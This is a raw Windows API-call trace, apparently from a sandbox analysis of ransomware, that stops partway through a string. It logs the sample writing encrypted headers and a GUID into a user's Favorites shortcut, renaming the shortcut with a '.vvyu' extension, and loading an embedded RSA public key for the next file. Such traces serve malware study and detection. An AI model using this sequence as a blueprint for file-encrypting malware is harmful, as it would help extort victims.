[0194.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.679] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.679] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.680] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.680] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.680] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.680] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24a0 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2458 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.681] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6380 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6368 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0194.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.685] GetCurrentThreadId () returned 0x5d8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7de8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.685] GetCurrentThreadId () returned 0x5d8 [0194.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6380 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63e0 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0194.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63f8 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6398 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6368 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2458 | out: hHeap=0x2c0000) returned 1 [0194.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.696] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.697] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.697] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.698] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.698] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.698] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.698] CloseHandle (hObject=0x584) returned 1 [0194.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0194.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.700] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url.vvyu")) returned 1 [0194.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.702] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.704] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0194.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0194.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.705] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0194.705] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.707] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.707] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.711] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.711] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.713] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.713] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.713] lstrlenA (lpString="-----BEGIN PUBLIC 